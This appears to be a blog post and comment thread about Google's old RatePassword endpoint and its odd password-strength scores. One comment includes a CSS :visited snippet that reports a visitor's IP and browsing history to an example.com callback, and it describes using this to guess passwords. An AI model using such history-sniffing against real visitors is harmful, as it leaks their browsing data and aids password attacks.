You can get a "password strength" rating from Google by using https://www.google.com/accounts/RatePassword?Passwd=[password]. This is used by the "change password" page on Google Accounts to show a bar indicating password strength.
This rating not only considers password length, capitalization, and the use of numbers as well as letter, but also the use of various dictionary words.
For example, https://www.google.com/accounts/RatePassword?Passwd=password , https://www.google.com/accounts/RatePassword?Passwd=gmail , and https://www.google.com/accounts/RatePassword?Passwd=google all give the lowest possible rating of "1", because "password", "gmail", and "google" would be insecure passwords for a Google account. https://www.google.com/accounts/RatePassword?Passwd=blogger and https://www.google.com/accounts/RatePassword?Passwd=googlemail both give a rating of "2".
Interestingly, https://www.google.com/accounts/RatePassword?Passwd=gdrive gives a rating of "3", even though similar passwords of the similar length and complexity such as https://www.google.com/accounts/RatePassword?Passwd=gsearch or https://www.google.com/accounts/RatePassword?Passwd=gstore give the highest rating of "4". I also observed that https://www.google.com/accounts/RatePassword?Passwd=glinux has a rating of "3" even though https://www.google.com/accounts/RatePassword?Passwd=gunix and https://www.google.com/accounts/RatePassword?Passwd=gbsd have a rating of "4". |
Maybe they just use their index? "Gdrive" is in 882000 pages, "GLinux" in 22000, my passwords in 0 page. |
Is it safe to Google your passwords? Hmm I guess so. They appear in your search history – but to see it you need the password anyway. |
If it's being googled server to server then there's no problem and it doesn't mean it should appear in ur search history. |
Sam:
Google logins use SSL encryption but Google web search does not use encryption, so it is not safe to Google your passwords. |
Moreover, if it's a specific password, it might get spotted. Not very interesting though.
But Googlers say they see really weird thing on the live query screens at Google |
Also, it is possible to use clever CSS to reveal whether a visitor to your website has visited a specific URL (for example: #foobar:visited { background: url('http://example.com/user_has_visited?ip=123.45.67.89&addr=http://foobar.com'); }). Although the simple CSS example I provided requires a server callback, with more elaborate code this is not necessary and all processing can be done in Javascript (for IE/Opera, use a javascript: URL as the background; for Mozilla, attach a XBL binding to the :visited and detect based upon a constructor call). Basically, this could be used to easily run a dictionary or even brute force attack on your password by tricking you into visiting a page. |
I think the 1 too 4 ratio is a little bit of cr*p because my most insecure password I use, only letters is four.
|
Hmm....
A lv 4 password is pretty secure eh?
I think I'm going to run out and change my pass to something more secure like dogcatrat
https://www.google.com/accounts/RatePassword?Passwd=dogcatrat
cause it is just as secure as my old password:
dogcatrat553495248985699!4059
according to G:
https://www.google.com/accounts/RatePassword?Passwd=dogcatrat553495248985699!4059 |
> Basically, this could be used to easily run a dictionary or even brute force
> attack on your password by tricking you into visiting a page.
I think it's easier to run dictionary attack on your password itself ;) You would notice if page attempted to load page with links to every possible world ;) And Google's search URL's differs depending on many factors. For example my search URL goes like this – http://www.google.pl/search?hl=en&lr=&safe=off&client=firefox-a&rls=com.ubuntu%3Aen-US%3Aofficial&hs=to3&q=my%20password&btnG=Search
|
For the 1 trillion word corpus they recently released, they considered any string that occured more than 200 times a word, IIRC. |
Ludwik:
It's not hard to determine what someone's Google search URL format is – for example, a HTTP referrer header could be used to determine it. |
"1![[put at-character here]](image/at.gif) 3" (without quote) is a pretty secure password. :) Lv. 4. |
